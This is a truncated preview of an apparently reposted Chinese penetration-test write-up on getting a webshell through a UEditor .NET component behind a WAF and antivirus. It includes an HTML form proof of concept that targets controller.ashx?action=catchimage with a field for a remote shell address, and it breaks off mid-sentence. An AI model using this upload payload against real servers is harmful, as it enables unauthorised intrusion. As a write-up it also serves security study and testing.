文章预览
扫码领资料 获网安教程 本文作者:ddwGeGe 文章来源: https: //xz.aliyun.com/t/14686 前言 前一段时间和小伙伴在某内网进行渗透测试,目标不给加白,只能进行硬刚了,队友fscan一把梭发现某资产疑似存在Ueditor组件,但初步测试是存在waf和杀软的,无法进行getshell,经过一番折腾最终getshell,文笔粗劣,大佬勿喷。 测试 看这返回内容,Ueditor实锤了,采用公开的POC进行尝试,由于是纯内网无法进行出网,直接本机电脑开启Web服务,充当VPS提供Shell地址 http://xx.xx.xx.xx/Scripts/Ueditor/net/controller.ashx < form action = "http://xxx.xx.xx.xx/Scripts/Ueditor/net/controller.ashx? action=catchimage" enctype = "application/x-www-form-urlencoded" method = "POST" > < p > shell addr: < input type = "text" name = "source[]" /> p > < input type = "submit" value = "Submit" /> form > 从访问日志可以看出是 ?.a?s?p?x 后缀,因为直接
………………………………